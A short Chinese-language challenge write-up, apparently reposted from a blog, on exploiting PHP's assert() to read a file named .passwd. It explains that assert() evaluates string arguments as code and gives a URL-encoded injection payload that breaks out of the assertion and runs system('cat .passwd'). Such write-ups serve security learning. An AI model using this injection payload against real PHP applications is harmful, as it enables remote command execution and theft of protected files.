首页 > Web开发 > 详细

PHP - assert()

时间:2019-12-22 11:23:50      阅读:79      评论:0      收藏:0      [点我收藏+]

Find and exploit the vulnerability to read the file .passwd.-------------查找并利用此漏洞读取文件.passwd。

 

assert:

  这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;

        assert ( mixed $assertion [, string $description ] ) : bool

  如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

 


 

开始挑战后,随便加点,让代码报错

技术分享图片

 

根据报错提示,拼接payload:

Payload:

%27,%27...%27)%20===false%20and%20%20system(%27cat%20.passwd%27)%20and%20strops(%27

PHP - assert()

原文:https://www.cnblogs.com/abbin-blog/p/12079173.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!